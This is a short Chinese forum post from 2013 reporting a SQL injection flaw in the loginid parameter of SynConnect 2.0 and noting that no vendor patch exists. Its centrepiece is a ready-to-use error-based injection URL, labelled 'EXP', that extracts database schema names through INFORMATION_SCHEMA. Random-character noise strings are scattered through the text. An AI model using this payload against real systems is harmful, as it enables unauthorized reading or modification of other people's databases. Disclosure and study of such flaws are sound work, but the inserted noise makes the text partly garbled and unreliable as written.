SynConnect中的loginid参数中存在SQL注入漏洞,该漏洞源于程序使用SQL查询之前没有充分验证用户提供的输入。攻击者利用该漏洞操控应用程序,访问或修改数据,或利用底层数据库中潜在的漏洞。SynConnect 2.0版本中存在漏洞,其他版本也可能受到影响。$ _+ p: [ t" F C# `' B% f: v/ y
; S$ Q8 e' k# M0 E6 w! p9 P9 I4 }, D目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:* M/ t6 C8 Z4 y& h! U% C
http://www.synchroweb.com/prod_syn.php7 k* u% m+ m0 | ^4 ]+ K, d$ C
! p$ `2 t" Z% W9 t: S3 P
EXP:
) Y: [+ I, N! w: c- P; k' M! f |+ @
: k% `/ e3 m# e" `" m; n1 Mhttp://localhost/index.php?func=logoff&loginid=1011′ AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT MID((IFNULL(CAST(schema_name AS CHAR),0×20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘bhdresh’=’bhdresh
8 D+ M" d* A9 p
7 E+ {2 N9 W9 F3 l% f |
发表于 2013-4-4 17:35:25
收藏
支持
反对